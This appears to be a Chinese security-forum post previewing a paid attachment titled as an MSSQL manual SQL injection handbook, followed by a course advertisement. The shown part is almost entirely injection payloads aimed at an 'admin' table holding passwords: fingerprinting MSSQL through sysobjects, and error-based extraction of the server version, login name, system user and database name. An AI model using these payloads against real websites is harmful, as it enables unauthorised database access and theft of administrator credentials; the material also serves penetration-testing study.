-
-
[文档]mssql手工注入手册.docx
-
发表于:
2019-10-14 12:21
1674
-
查询当前是否为mssql数据库(页面正常是,页面不正常不是)
SELECT admin, passwd, id FROM admin WHERE id=1 and exists(select * from sysobjects);--
查询当前数据库的版本
SELECT admin, passwd, id FROM admin WHERE id=1 and 1=CONVERT(int,(select @@VERSION));--
SELECT admin, passwd, id FROM admin WHERE id=1 and @@version>0;--
SELECT admin, passwd, id FROM admin WHERE id=1 and 1=(select @@VERSION);--
1.查询当前数据库用户名
SELECT admin,passwd,id FROM admin WHERE id=1;SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;--(一般查询不了)
SELECT admin, passwd, id FROM admin WHERE id=1 and 1=CONVERT(int,(select suser_sname()));--(数据库名)
SELECT admin, passwd, id FROM admin WHERE id=1 and system_user>0;--(数据库用户名)
SELECT admin, passwd, id FROM admin WHERE id=1 And 1=(select db_name());--(数据库名)
。。。。。。。。。。。。。。。
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
最后于 2019-10-15 12:35
被wsc编辑
,原因:
注:下载本附件需支付
30雪币(note:30 points for
downloading this attachment)